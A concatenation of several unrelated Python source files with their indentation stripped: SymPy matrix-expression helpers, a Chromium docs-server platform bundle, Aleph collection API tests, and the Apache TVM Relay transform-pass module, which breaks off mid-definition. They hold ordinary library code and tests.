elif isinstance(expr, Transpose):
return expr
elif isinstance(expr, MatrixExpr):
return expr
return expr
def _suppress_trivial_dims_in_tensor_product(mat_list):
# Recognize expressions like [x, y] with shape (k, 1, k, 1) as `x*y.T`.
# The matrix expression has to be equivalent to the tensor product of the matrices, with trivial dimensions (i.e. dim=1) dropped.
# That is, add contractions over trivial dimensions:
mat_11 = []
mat_k1 = []
for mat in mat_list:
if mat.shape == (1, 1):
mat_11.append(mat)
elif 1 in mat.shape:
if mat.shape[0] == 1:
mat_k1.append(mat.T)
else:
mat_k1.append(mat)
else:
return mat_list
if len(mat_k1) > 2:
return mat_list
a = MatMul.fromiter(mat_k1[:1])
b = MatMul.fromiter(mat_k1[1:])
x = MatMul.fromiter(mat_11)
return a*x*b.T
def _unfold_recognized_expr(expr):
if isinstance(expr, _RecognizeMatOp):
return expr.operator(*[_unfold_recognized_expr(i) for i in expr.args])
elif isinstance(expr, _RecognizeMatMulLines):
unfolded = [_unfold_recognized_expr(i) for i in expr]
mat_list = [i for i in unfolded if isinstance(i, MatrixExpr)]
scalar_list = [i for i in unfolded if i not in mat_list]
scalar = Mul.fromiter(scalar_list)
mat_list = [i.doit() for i in mat_list]
mat_list = [i for i in mat_list if not (i.shape == (1, 1) and i.is_Identity)]
if mat_list:
mat_list[0] *= scalar
if len(mat_list) == 1:
return mat_list[0].doit()
else:
return _suppress_trivial_dims_in_tensor_product(mat_list)
else:
return scalar
else:
return expr
def _apply_recursively_over_nested_lists(func, arr):
if isinstance(arr, (tuple, list, Tuple)):
return tuple(_apply_recursively_over_nested_lists(func, i) for i in arr)
elif isinstance(arr, Tuple):
return Tuple.fromiter(_apply_recursively_over_nested_lists(func, i) for i in arr)
else:
return func(arr)
def _build_push_indices_up_func_transformation(flattened_contraction_indices):
shifts = {0: 0}
i = 0
cumulative = 0
while i < len(flattened_contraction_indices):
j = 1
while i+j < len(flattened_contraction_indices):
if flattened_contraction_indices[i] + j != flattened_contraction_indices[i+j]:
break
j += 1
cumulative += j
shifts[flattened_contraction_indices[i]] = cumulative
i += j
shift_keys = sorted(shifts.keys())
def func(idx):
return shifts[shift_keys[bisect.bisect_right(shift_keys, idx)-1]]
def transform(j):
if j in flattened_contraction_indices:
return None
else:
return j - func(j)
return transform
def _build_push_indices_down_func_transformation(flattened_contraction_indices):
N = flattened_contraction_indices[-1]+2
shifts = [i for i in range(N) if i not in flattened_contraction_indices]
def transform(j):
if j < len(shifts):
return shifts[j]
else:
return j + shifts[-1] - len(shifts) + 1
return transform
|
from .test_stat import *
from .test_pyplotlm import *
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from api_categorizer import APICategorizer
from api_models import APIModels
from availability_finder import AvailabilityFinder
from empty_dir_file_system import EmptyDirFileSystem
from environment import IsDevServer
from features_bundle import FeaturesBundle
from future import All
from platform_util import GetPlatforms, PlatformToExtensionType
from reference_resolver import ReferenceResolver
from samples_model import SamplesModel
from future import Future
from schema_processor import SchemaProcessorFactory
class _PlatformData(object):
def __init__(self):
self.features_bundle = None
self.api_models = None
self.reference_resolver = None
self.availability_finder = None
self.api_categorizer = None
self.samples_model = None
class PlatformBundle(object):
'''Creates various objects for different platforms
'''
def __init__(self,
branch_utility,
compiled_fs_factory,
host_fs_at_master,
host_file_system_iterator,
object_store_creator,
base_path):
self._branch_utility = branch_utility
self._compiled_fs_factory = compiled_fs_factory
self._host_fs_at_master = host_fs_at_master
self._host_file_system_iterator = host_file_system_iterator
self._object_store_creator = object_store_creator
self._base_path = base_path
self._platform_data = dict((p, _PlatformData()) for p in GetPlatforms())
def GetSamplesModel(self, platform):
if self._platform_data[platform].samples_model is None:
# Note: samples are super slow in the dev server because it doesn't
# support async fetch, so disable them.
if IsDevServer():
extension_samples_fs = EmptyDirFileSystem()
app_samples_fs = EmptyDirFileSystem()
else:
extension_samples_fs = self._host_fs_at_master
# TODO(kalman): Re-enable the apps samples, see http://crbug.com/344097.
app_samples_fs = EmptyDirFileSystem()
#app_samples_fs = github_file_system_provider.Create(
# 'GoogleChrome', 'chrome-app-samples')
self._platform_data[platform].samples_model = SamplesModel(
extension_samples_fs,
app_samples_fs,
self._compiled_fs_factory,
self.GetReferenceResolver(platform),
self._base_path,
platform)
return self._platform_data[platform].samples_model
def GetFeaturesBundle(self, platform):
if self._platform_data[platform].features_bundle is None:
self._platform_data[platform].features_bundle = FeaturesBundle(
self._host_fs_at_master,
self._compiled_fs_factory,
self._object_store_creator,
platform)
return self._platform_data[platform].features_bundle
def GetAPIModels(self, platform):
if self._platform_data[platform].api_models is None:
# TODO(danielj41): Filter APIModels data here rather than passing the
# platform.
self._platform_data[platform].api_models = APIModels(
self.GetFeaturesBundle(platform),
self._compiled_fs_factory,
self._host_fs_at_master,
self._object_store_creator,
platform,
SchemaProcessorFactory(
Future(callback=lambda: self.GetReferenceResolver(platform)),
Future(callback=lambda: self.GetAPIModels(platform)),
Future(callback=lambda: self.GetFeaturesBundle(platform)),
self._compiled_fs_factory,
self._host_fs_at_master))
return self._platform_data[platform].api_models
def GetReferenceResolver(self, platform):
if self._platform_data[platform].reference_resolver is None:
self._platform_data[platform].reference_resolver = ReferenceResolver(
self.GetAPIModels(platform),
self._object_store_creator.Create(ReferenceResolver,
category=platform))
return self._platform_data[platform].reference_resolver
def GetAvailabilityFinder(self, platform):
if self._platform_data[platform].availability_finder is None:
self._platform_data[platform].availability_finder = AvailabilityFinder(
self._branch_utility,
self._compiled_fs_factory,
self._host_file_system_iterator,
self._host_fs_at_master,
self._object_store_creator,
platform,
SchemaProcessorFactory(
Future(callback=lambda: self.GetReferenceResolver(platform)),
Future(callback=lambda: self.GetAPIModels(platform)),
Future(callback=lambda: self.GetFeaturesBundle(platform)),
self._compiled_fs_factory,
self._host_fs_at_master))
return self._platform_data[platform].availability_finder
def GetAPICategorizer(self, platform):
if self._platform_data[platform].api_categorizer is None:
self._platform_data[platform].api_categorizer = APICategorizer(
self._host_fs_at_master,
self._compiled_fs_factory,
platform)
return self._platform_data[platform].api_categorizer
def Refresh(self):
return All(self.GetAPIModels(platform).Refresh()
for platform in self._platform_data.keys())
def GetIdentity(self):
return self._host_fs_at_master.GetIdentity()
|
import json
from aleph.core import db
from aleph.authz import Authz
from aleph.model import EntitySet
from aleph.logic.collections import compute_collection
from aleph.views.util import validate
from aleph.tests.util import TestCase, JSON
class CollectionsApiTestCase(TestCase):
def setUp(self):
super(CollectionsApiTestCase, self).setUp()
self.rolex = self.create_user(foreign_id="user_3")
self.col = self.create_collection(
label="Test Collection",
foreign_id="test_coll_entities_api",
category="leak",
countries=["us"],
languages=["eng"],
)
self.ent = self.create_entity(
{
"schema": "Person",
"properties": {"name": "Winnie the Pooh", "country": "za"},
},
self.col,
)
db.session.add(self.ent)
db.session.commit()
def test_index(self):
res = self.client.get("/api/2/collections")
assert res.status_code == 200, res
assert res.json["total"] == 0, res.json
_, headers = self.login(is_admin=True)
res = self.client.get("/api/2/collections", headers=headers)
assert res.status_code == 200, res
assert res.json["total"] == 1, res.json
assert res.json["results"][0]["languages"] == ["eng"], res.json
assert res.json["results"][0]["countries"] == ["us"], res.json
assert validate(res.json["results"][0], "Collection")
def test_sitemap(self):
res = self.client.get("/api/2/sitemap.xml")
assert res.status_code == 200, res
assert b"<loc>" not in res.data, res.data
self.grant_publish(self.col)
res = self.client.get("/api/2/sitemap.xml")
assert b"<loc>" in res.data, res.data
def test_view(self):
res = self.client.get("/api/2/collections/%s" % self.col.id)
assert res.status_code == 403, res
_, headers = self.login(is_admin=True)
res = self.client.get("/api/2/collections/%s" % self.col.id, headers=headers)
assert res.status_code == 200, res
assert "test_coll" in res.json["foreign_id"], res.json
assert "Winnie" not in res.json["label"], res.json
assert validate(res.json, "Collection")
def test_update_valid(self):
_, headers = self.login(is_admin=True)
url = "/api/2/collections/%s" % self.col.id
res = self.client.get(url, headers=headers)
assert res.status_code == 200, res
data = res.json
data["label"] = "Collected Collection"
res = self.client.post(
url, data=json.dumps(data), headers=headers, content_type=JSON
)
assert res.status_code == 200, res.json
assert "Collected" in res.json["label"], res.json
assert validate(res.json, "Collection")
def test_update_no_label(self):
_, headers = self.login(is_admin=True)
url = "/api/2/collections/%s" % self.col.id
res = self.client.get(url, headers=headers)
data = res.json
data["label"] = ""
res = self.client.post(
url, data=json.dumps(data), headers=headers, content_type=JSON
)
assert res.status_code == 400, res.json
res = self.client.get(url, headers=headers)
data = res.json
data["category"] = "banana"
res = self.client.post(
url, data=json.dumps(data), headers=headers, content_type=JSON
)
assert res.status_code == 400, res.json
def test_delete(self):
_, headers = self.login(is_admin=True)
url = "/api/2/collections/%s" % self.col.id
res = self.client.get(url, headers=headers)
assert res.status_code == 200, res
res = self.client.delete(url, headers=headers)
assert res.status_code == 204, res
res = self.client.get(url, headers=headers)
assert res.status_code == 404, res
def test_bulk_api(self):
_, headers = self.login(is_admin=True)
data = json.dumps(
[
{
"id": "4345800498380953840",
"schema": "Person",
"properties": {"name": "Osama bin Laden"},
},
{
"id": "7598743983789743598",
"schema": "Person",
"properties": {"name": "Osama bin Laden"},
},
]
)
url = "/api/2/collections/%s/_bulk" % self.col.id
res = self.client.post(url, data=data)
assert res.status_code == 403, res
res = self.client.post(url, headers=headers, data=data)
assert res.status_code == 204, res
query = "/api/2/entities?filter:schemata=Thing&filter:collection_id=%s"
query = query % self.col.id
res = self.client.get(query, headers=headers)
assert res.json["total"] == 2, res.json
data = [{"schema": "Person", "properties": {"name": "Osama bin Laden"}}]
res = self.client.post(url, headers=headers, data=json.dumps(data))
assert res.status_code == 400, res
res = self.client.get(query, headers=headers)
assert res.json["total"] == 2, res.json
data = [
{
"id": "7598743983789743598",
"schema": "Lollipop",
"properties": {"name": "Osama bin Laden"},
}
]
res = self.client.post(url, headers=headers, data=json.dumps(data))
assert res.status_code == 400, res
def test_bulk_entitysets_api(self):
role, headers = self.login(is_admin=True)
authz = Authz.from_role(role)
data = {"type": EntitySet.LIST, "label": "Foo"}
eset = EntitySet.create(data, self.col, authz)
db.session.commit()
eset_id = eset.id
data = json.dumps(
[
{
"id": "4345800498380953840",
"schema": "Person",
"properties": {"name": "Osama bin Laden"},
},
{
"id": "7598743983789743598",
"schema": "Person",
"properties": {"name": "Osama bin Laden"},
},
]
)
url = "/api/2/collections/%s/_bulk?entityset_id=%s" % (self.col.id, eset_id)
res = self.client.post(url, headers=headers, data=data)
assert res.status_code == 204, res
query = "/api/2/entitysets/%s/entities?filter:schema=Person" % eset_id
res = self.client.get(query, headers=headers)
assert res.json["total"] == 2, res.json
def test_statistics(self):
self.load_fixtures()
compute_collection(self.private_coll, sync=True)
_, headers = self.login(is_admin=True)
url = "/api/2/collections/%s" % self.private_coll.id
res = self.client.get(url, headers=headers)
assert res.status_code == 200, res
stats = res.json["statistics"]
assert "Folder" in stats["schema"]["values"], stats
assert "vladimir_l@example.com" in stats["emails"]["values"], stats
def test_status(self):
_, headers = self.login(is_admin=True)
url = "/api/2/collections/%s/status" % self.col.id
res = self.client.get(url)
assert res.status_code == 403, res
res = self.client.get(url, headers=headers)
assert res.status_code == 200, res
assert 0 == res.json["pending"], res.json
meta = {
"countries": ["de", "us"],
"languages": ["eng"],
"mime_type": "text/csv",
"source_url": "http://pudo.org/experts.csv",
"collection_id": self.col.id,
}
csv_path = self.get_fixture_path("experts.csv")
data = {
"meta": json.dumps(meta),
"foo": open(csv_path, "rb"),
}
ingest_url = "/api/2/collections/%s/ingest" % self.col.id
res = self.client.post(ingest_url, data=data, headers=headers)
assert res.status_code == 201, res
res = self.client.get(url, headers=headers)
assert res.status_code == 200, res
assert 1 == res.json["pending"], res.json
assert validate(res.json, "CollectionStatus")
res = self.client.delete(url)
assert res.status_code == 403, res
res = self.client.delete(url, headers=headers)
assert res.status_code == 204, res
res = self.client.get(url, headers=headers)
assert res.status_code == 200, res
assert 0 == res.json["pending"], res.json
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument, missing-docstring, unused-import
"""
Relay pass transformation infrastructure.
"""
import functools
import inspect
import types
import warnings
import tvm.ir
from tvm import relay, te
from tvm.runtime import ndarray as _nd
from . import _ffi_api
from ..backend.utils import mangle_module_name
def build_config(opt_level=2, required_pass=None, disabled_pass=None, trace=None):
"""Configure the build behavior by setting config variables. This function
will be deprecated in TVM v0.7. Instead, we should directly use
tvm.transform.PassContext.
Parameters
----------
opt_level: int, optional
Optimization level. The optimization pass name and level are as the
following:
.. code-block:: python
OPT_PASS_LEVEL = {
"SimplifyInference": 0,
"OpFusion": 1,
"FoldConstant": 2,
"FoldScaleAxis": 3,
"AlterOpLayout": 3,
"CanonicalizeOps": 3,
"CanonicalizeCast": 3,
"EliminateCommonSubexpr": 3,
"CombineParallelConv2D": 4,
"CombineParallelDense": 4,
"CombineParallelBatchMatmul": 4,
"FastMath": 4
}
required_pass: set of str, optional
Optimization passes that are required regardless of optimization level.
disabled_pass: set of str, optional
Optimization passes to be disabled during optimization.
trace: Callable[[IRModule, PassInfo, bool], None]
A tracing function for debugging or introspection.
Returns
-------
pass_context: PassContext
The pass context for optimizations.
"""
warnings.warn(
"relay.build_config will be deprecated. Please use \
tvm.transform.PassContext directly",
DeprecationWarning,
)
return tvm.transform.PassContext(opt_level, required_pass, disabled_pass, trace)
@tvm._ffi.register_object("relay.FunctionPass")
class FunctionPass(tvm.ir.transform.Pass):
"""A pass that works on each tvm.relay.Function in a module. A function
pass class should be created through `function_pass`.
"""
def InferType():
"""Infer the type of an expr.
Returns
-------
ret : tvm.transform.Pass
The registered type inference pass.
"""
return _ffi_api.InferType()
def InferTypeLocal(expr):
"""Infer the type of a single expr, reusing type information to do so.
This populates the checked_type field in expr. We assume existing type information
in the graph is correct!
Parameters
----------
expr: relay.Expr
The expression we want to know the type of
Returns
-------
type: relay.Type
The type of the expression
"""
return _ffi_api.InferTypeLocal(expr)
def FoldScaleAxis():
"""Fold the scaling of axis into weights of conv2d/dense. This pass will
invoke both forward and backward scale folding.
Returns
-------
ret : tvm.transform.Pass
The registered pass to fold expressions.
Note
----
Internally, we will call backward_fold_scale_axis before using
forward_fold_scale_axis as backward folding targets the common conv->bn
pattern.
"""
return _ffi_api.FoldScaleAxis()
def BackwardFoldScaleAxis():
"""Backward fold axis scaling into weights of conv2d/dense.
Returns
-------
ret : tvm.transform.Pass
The registered pass to backward fold expressions.
Note
----
It is recommended to call backward_fold_scale_axis
before using forward_fold_scale_axis as backward folding targets the common
conv->bn pattern.
"""
return _ffi_api.BackwardFoldScaleAxis()
def RemoveUnusedFunctions(entry_functions=None):
"""Remove unused global relay functions in a relay module.
Parameters
----------
entry_functions: list[string]
The set of entry functions to start from.
Returns
-------
ret : tvm.transform.Pass
The registered pass to remove unused functions.
"""
if entry_functions is None:
entry_functions = ["main"]
return _ffi_api.RemoveUnusedFunctions(entry_functions)
def ForwardFoldScaleAxis():
"""Fold the scaling of axis into weights of conv2d/dense.
Returns
-------
ret : tvm.transform.Pass
The registered pass to forward fold expressions.
Note
----
It is recommended to call backward_fold_scale_axis
before using forward_fold_scale_axis, as backward folding targets the
common conv->bn pattern.
"""
return _ffi_api.ForwardFoldScaleAxis()
def SimplifyInference():
"""Simplify the data-flow graph for inference phase. An simplified expression
which is semantically equal to the input expression will be returned.
Note that batch norms will only be simplified if their result is indexed at
tuple index 0.
Returns
-------
ret: tvm.transform.Pass
The registered pass to perform operator simplification.
"""
return _ffi_api.SimplifyInference()
def FastMath():
"""Converts the expensive non linear functions to their fast but approximate counterparts.
Returns
-------
ret: tvm.transform.Pass
The registered pass to perform fast math operations.
"""
return _ffi_api.FastMath()
def CanonicalizeOps():
"""Canonicalize special operators to basic operators.
This can simplify followed analysis, e.g. expanding bias_add to
expand_dims and broadcast_add.
Returns
-------
ret: tvm.transform.Pass
The registered pass performing the canonicalization.
"""
return _ffi_api.CanonicalizeOps()
def DeadCodeElimination(inline_once=False, ignore_impurity=False):
"""Remove expressions that do not have any users (dead code).
Parameters
----------
inline_once: Optional[Bool]
Whether to inline a binding that is referenced exactly once.
ignore_impurity: Optional[Bool]
Whether to ignore possible side-effects in let-bound expressions.
Returns
-------
ret: tvm.transform.Pass
The registered pass that eliminates the dead code in a Relay program.
"""
return _ffi_api.DeadCodeElimination(inline_once, ignore_impurity)
def LazyGradientInit():
"""Reduces memory usage of gradient tensors
Parameters
----------
Returns
-------
ret: tvm.transform.Pass
A pass which delays and/or reduces memory allocation,
by lazily allocating 0 or one filled tensors.
"""
return _ffi_api.LazyGradientInit()
def FoldConstantExpr(expr, mod):
"""Fold the constant expressions in a Relay program.
Parameters
----------
expr: Expr
The expression to fold
mod: IRModule
The module the expr lives in (for global calls)
Returns
-------
new_expr: Expr
The expr after Constant Folding
"""
return _ffi_api.FoldConstantExpr(expr, mod)
def FoldConstant():
"""Fold the constant expressions in a Relay program.
Returns
-------
ret : tvm.transform.Pass
The registered pass for constant folding.
"""
return _ffi_api.FoldConstant()
def FuseOps(fuse_opt_level=-1):
"""Fuse operators in an expr to a larger operator according to some rules.
Parameters
----------
fuse_opt_level : int
The level of fuse optimization. -1 indicates that the level will be
inferred from pass context.
Returns
-------
ret : tvm.transform.Pass
The registered pass for operator fusion.
"""
return _ffi_api.FuseOps(fuse_opt_level)
def DefuseOps():
"""The inverse operation of FuseOps. It transforms a fused program returned by FuseOps into the
program before FuseOps. (i.e., x == DefuseOps(FuseOps(x)))
Returns
-------
ret : tvm.transform.Pass
The registered pass for operator defusion.
"""
return _ffi_api.DefuseOps()
def CombineParallelConv2D(min_num_branches=3):
"""Combine multiple conv2d operators into one.
Parameters
----------
min_num_branches : int
The minimum number of required parallel branches for performing this
optimization.
Returns
-------
ret: tvm.transform.Pass
The registered pass that combines parallel conv2d operators.
"""
return _ffi_api.CombineParallelConv2D(min_num_branches)
def CombineParallelDense(min_num_branches=3, to_batch=True):
"""Combine multiple dense operators into one. For example:
.. code-block
data
/ \
dense (2,2) dense (2,2)
| |
elemwise/bcast (2,2) elemwise/bcast (2,2)
Would become:
.. code-block
data
|
batch_matmul+elemwise/bcast (2,2,2)
or (if to_batch=False)
.. code-block
data
|
dense+elemwise/bcast (2,2+2)
Parameters
----------
min_num_branches : int
The minimum number of required parallel branches for performing this
optimization.
to_batch_matmul : bool
If True, combine parallel dense ops into batch_matmul op.
If False, combine parallel dense ops into dense op.
Returns
-------
ret: tvm.transform.Pass
The registered pass that combines parallel dense operators.
"""
return _ffi_api.CombineParallelDense(min_num_branches, to_batch)
def CombineParallelBatchMatmul(min_num_branches=3):
"""Combine multiple batch matmul operators into one. For example:
.. code-block
data (1, 2, 3)
/ \
batch_matmul(data, (1, 4, 3)) batch_matmul(data, (1, 5, 3))
| |
elemwise/bcast (1, 2, 4) elemwise/bcast (1, 2, 5)
Would become:
.. code-block
data (1, 2, 3)
|
batch_matmul(data, (1, 4+5, 3))
|
elemwise/bcast (1 ,2, 4+5)
Parameters
----------
min_num_branches : int
The minimum number of required parallel branches for performing this
optimization.
Returns
-------
ret: tvm.transform.Pass
The registered pass that combines parallel dense operators.
"""
return _ffi_api.CombineParallelBatchMatmul(min_num_branches)
def BatchingOps():
"""Batching parallel operators into one for Conv2D, Dense and BatchMatmul.
Returns
-------
ret: tvm.transform.Pass
The sequential pass which apply batching for different operator types.
"""
return tvm.transform.Sequential(
[CombineParallelConv2D(), CombineParallelDense(), CombineParallelBatchMatmul()]
)
def AlterOpLayout():
"""Alternate the layouts of operators or replace primitive operators with
other expressions.
This pass can be used for computing convolution in custom layouts or
other general weight pre-transformation.
Returns
-------
ret : tvm.transform.Pass
The registered pass that alters the layout of operators.
"""
return _ffi_api.AlterOpLayout()
class LayoutConfig(object):
"""A structure for customizing the ConvertLayout pass."""
current = None
def __init__(self, skip_layers=None):
self.skip_counter = 0
self.skip_layers = skip_layers if skip_layers is not None else []
def check_skip(self):
skip = self.skip_counter in self.skip_layers
self.skip_counter += 1
return skip
def reset(self):
self.skip_counter = 0
self.skip_layers = []
def __enter__(self):
self._old_manager = LayoutConfig.current
LayoutConfig.current = self
return self
def __exit__(self, ptype, value, trace):
LayoutConfig.current = self._old_manager
def ConvertLayout(desired_layouts):
"""Given a dest layout, this pass transforms the expr such that most of the ops input data
layout is changed to the dest layout. In ideal situation, there are only 2 layout transforms,
one at the start and one at the end.
This pass is not a part of relay.build and is expected to be called between framework-relay
parser and relay.build call. This is very helpful for hardware backends that support/prefer only
type of data layout.
RFC - https://discuss.tvm.apache.org/t/layout-conversion-pass/4009
This pass uses most of the AlterOpLayout and InferCorrectLayout infrastructure. We can define
new layouts for conv2d ops for now. Most of the other operators try to adapt to their input
layout using the InferCorrectLayout infrastructure.
Parameters
----------
desired_layouts : map of op_name to list of layouts
Specify a mapping of operator names to a list of layouts to convert to, in the order
defined by the operator. An example for nn.conv2d could be: {"nn.conv2d", ["NHWC", "OHWI]},
where the first item in the list specifies the data layout and the second specifies the
kernel layout.
Returns
-------
pass: FunctionPass
The pass.
"""
return _ffi_api.ConvertLayout(desired_layouts)
def Legalize(legalize_map_attr_name="FTVMLegalize"):
"""Legalizes an expression with another expression.
This pass can be used to replace an expr with another expr for target
dependent optimizations. For example, one expr, though semnatically
equivalent to the other, can have better performance on a target. This pass
can be used to legalize the expr in a target-dependent manner.
Parameters
----------
legalize_map_attr_name : str
The Op's attr name which corresponds to the legalize rule function.
Returns
-------
ret : tvm.transform.Pass
The registered pass that rewrites an expr.
"""
return _ffi_api.Legalize(legalize_map_attr_name)
def MergeComposite(pattern_table):
"""Merge multiple operators into a single composite relay function.
Parameters
----------
pattern_table : List[Tuple[str, tvm.relay.dataflow_pattern.DFPattern, Function]]
A list of (pattern_name, pattern, check) tuples.
The order of the patterns in the list will determine the order
of priority in which they are matched.
'check' is a function to check whether an extracted pattern matches.
It can be implemented by pattern writer but if not specified it will
always return True.
Returns
-------
ret : tvm.transform.Pass
The registered pass that merges operators into a single composite
relay function.
"""
pattern_names = []
patterns = []
checks = []
for tup in pattern_table:
if len(tup) == 2:
pattern_name, pattern = tup
check = lambda extract: True
elif len(tup) == 3:
pattern_name, pattern, check = tup
pattern_names.append(pattern_name)
patterns.append(pattern)
checks.append(check)
return _ffi_api.MergeComposite(pattern_names, patterns, *checks)
def MergeCompilerRegions():
"""Merge together compiler regions.
Returns
-------
ret : tvm.transform.Pass
The registered pass that merges compiler regions.
"""
return _ffi_api.MergeCompilerRegions()
def ToANormalForm():
"""Turn Graph Normal Form expression into A Normal Form Expression.
The scope of the root expression is the global scope.
The scope of any non root expression is the least common ancestor of all it's scope.
Values are ordered by post-DFS order in each scope.
Returns
-------
ret : Union[tvm.transform.Pass, tvm.relay.Expr]
The registered pass that transforms an expression into A Normal Form.
"""
return _ffi_api.ToANormalForm()
def ToANormalFormExpr(e):
"""ToANormalForm, but on expression level.
Parameters
----------
e : Expr
The graph expression.
Returns
-------
ret : Expr
The transformed expresion.
"""
return _ffi_api.ToANormalFormExpr(e)
def ToBasicBlockNormalForm():
"""Turn an expression to Basic Block Normal Form.
We define a block as a group of expressions implied by the scope structure.
Each graph node can only belong to a single block.
For any value that is being used in multiple blocks, it has to be referred
by a Var which is defined in a block, whose scope is the least common ancestor
of blocks this value is used.
Returns
-------
ret: tvm.transform.Pass
The registered pass that transforms an expression into Basic Block Normal Form.
"""
return _ffi_api.ToBasicBlockNormalForm()
def ToCPS(expr, mod=None):
"""
Turn expression into continuation passing style(CPS).
Every intermediate compute will be passed to a continuation.
Returns
-------
result: tvm.transform.Pass
The registered pass that transforms an expression into CPS.
"""
return _ffi_api.to_cps(expr, mod)
def EtaExpand(expand_constructor=False, expand_global_var=False):
"""Add abstraction over a constructor or global variable bound to a function
Parameters
----------
expand_constructor: bool
Whether to expand constructors.
expand_global_var: bool
Whether to expand global variables.
Returns
-------
ret: tvm.transform.Pass
The registered pass that eta expands an expression.
"""
return _ffi_api.EtaExpand(expand_constructor, expand_global_var)
def ToGraphNormalForm():
"""Turn a Relay program in A Normal Form into Graph Normal Form
Returns
-------
ret : tvm.transform.Pass
The registered pass that transforms an expression into Graph Normal Form.
"""
return _ffi_api.ToGraphNormalForm()
def EliminateCommonSubexpr(fskip=None):
"""Eliminate common subexpressions.
Parameters
----------
fskip: Callable
The callback function that decides whether an expression should be
skipped.
Returns
-------
ret : tvm.transform.Pass
The registered pass that eliminates common subexpressions.
"""
return _ffi_api.EliminateCommonSubexpr(fskip)
def PartialEvaluate():
"""Evaluate the static fragment of the code.
Note
----
This transformation could be either `Module -> Module` or `Expr -> Expr`.
It will directly transform the input expression to a new one if the target
expression is provided. Otherwise, it will rely on the pass manager to
carry out transformation.
Returns
-------
ret: tvm.transform.Pass
The registered pass that performs partial evaluation on an expression.
"""
return _ffi_api.PartialEvaluate()
def CanonicalizeCast():
"""
Canonicalize cast expressions to make operator fusion more efficient.
Returns
-------
ret : tvm.transform.Pass
The registered pass that canonicalizes cast expression.
"""
return _ffi_api.CanonicalizeCast()
def LambdaLift():
"""
Lift the closure to global function.
Returns
-------
ret : tvm.transform.Pass
The registered pass that lifts the lambda function.
"""
return _ffi_api.LambdaLift()
def PartitionGraph(mod_name="default", bind_constants=True):
"""Partition a Relay program into regions that can be executed on different
backends.
Parameters
----------
mod_name : string
Controls the prefix of the name of each partitioned subraph.
If `mod_name` is None, then `tvmgen_` prefix is used.
Otherwise, `tvmgen_mod_name_` prefix is used.
bind_constants: bool
Whether or not to bind constants in partitioned subgraphs. Note that the codegen needs
to maintain the bound constants; Otherwise the constants will be maintained by
the metadata module. So it is recommended for C-source based codegens to
set bind_constants=False to avoid embedding large constants in a C source file.
Returns
-------
ret: tvm.transform.Pass
The registered pass that partitions the Relay program.
"""
mod_name = mangle_module_name(mod_name)
return _ffi_api.PartitionGraph(mod_name, bind_constants)
def AnnotateTarget(targets, include_non_call_ops=True):
"""Annotate ops in an experession with a provied compiler/target and then
use it for codegen.
Parameters
----------
targets : str or List[str]
The list of target compilers used for codegen.
include_non_call_ops : boolean
If True then non-call ops also will be annotated with targets
If False then non-call ops will not be processed
Returns
-------
ret : tvm.transform.Pass
The annotated pass that wrapps ops with subgraph_start and
subgraph_end.
"""
if isinstance(targets, str):
targets = [targets]
return _ffi_api.AnnotateTarget(
[tvm.runtime.container.String(t) for t in targets], include_non_call_ops
)
def DynamicToStatic():
"""If possible, convert tvm.relay.dynamic* ops to static versions
Returns
-------
ret : tvm.transform.Pass
The registered pass for dynamic->static conversion.
"""
return _ffi_api.DynamicToStatic()
def Inline():
"""Perform inlining on the given Relay IR module. The global functions that
are marked as `inline` should be always inlined. A cost model will be
needed in the future to decide if it is profitable to inline the function.
Returns
-------
ret: tvm.transform.Pass
The registered pass that performs inlining for a Relay IR module.
"""
return _ffi_api.Inline()
def gradient(expr, mod=None, mode="higher_order"):
"""
Transform the input function,
returning a function that calculate the original result,
paired with gradient of the input.
Parameters
----------
expr : tvm.relay.Expr
The input expression, which is a Function or a GlobalVar.
mod : Optional[tvm.IRModule]
mode : Optional[String]
The mode of the automatic differentiation algorithm.
'first_order' only works on first order code, but will not produce
reference nor closure.
'higher_order' works on all code using reference and closure.
Returns
-------
expr : tvm.relay.Expr
The transformed expression.
"""
if mode == "first_order":
warnings.warn(
"using transform.gradient for first-order AD is deprecated, please use the"
"FirstOrderGradient module pass",
DeprecationWarning,
)
if mod is not None:
raise RuntimeError(
"to run first-order AD on a module, please use the FirstOrderGradient module pass."
)
return FirstOrderGradient()(tvm.IRModule.from_expr(expr))["main"]
if mode == "higher_order":
return _ffi_api.gradient(expr, mod)
raise Exception("unknown mode")
def FirstOrderGradient():
"""
Transforms all global functions in the module to return the original result, paired with the
gradients of the inputs. This pass transforms each global function independently and does not
support interprocedural AD. Additionally, this pass does not support any control-flow or
references, and should only be used on pure data-flow graphs.
Returns
-------
ret : tvm.transform.Pass
The registered FirstOrderGradient pass.
"""
return _ffi_api.FirstOrderGradient()
def Defunctionalization(func, mod):
"""
Performs defunctionalization on func,
transforming func from a higher-order program to a first-order program.
At each call site, the function is cloned and type parameters are substituted in.
Function arguments are encoded as datatypes
and additional apply functions are used for application.
Parameters
----------
func : tvm.relay.Function
The input function, which should not be polymorphic or be higher-order.
This is because all types must be known and we can't encode function arguments
to the program itself.
mod : tvm.IRModule
The IRModule containing function and type definitions,
which is also mutated during this pass.
Returns
-------
expr : tvm.relay.Function
The output function.
"""
return _ffi_api.Defunctionalization(func, mod)
def to_cps(func, mod=None):
"""
Turn expression into CPS expression.
Every intermediate compute will be passed to a continuation.
Parameters
----------
func: tvm.relay.Function
The input function.
mod: Optional[tvm.IRModule]
The global module.
Returns
-------
result: tvm.relay.Function
The output function.
"""
use_mod = mod if mod is not None else tvm.ir.IRModule()
return _ffi_api.to_cps(func, use_mod)
def un_cps(func):
"""
Turn an cps function into a Function without the continuation argument.
Note that this will not give the exact same interface as before cps:
If the input/output is higher order, they will still be in cps form.
Parameters
----------
func: tvm.relay.Function
The input function
Returns
-------
result: tvm.relay.Function
The output function
"""
return _ffi_api.un_cps(func)
def _wrap_class_function_pass(pass_cls, pass_info):
"""Wrap a python class as function pass"""
class PyFunctionPass(FunctionPass):
"""Internal wrapper class to create a class instance."""
def __init__(self, *args, **kwargs):
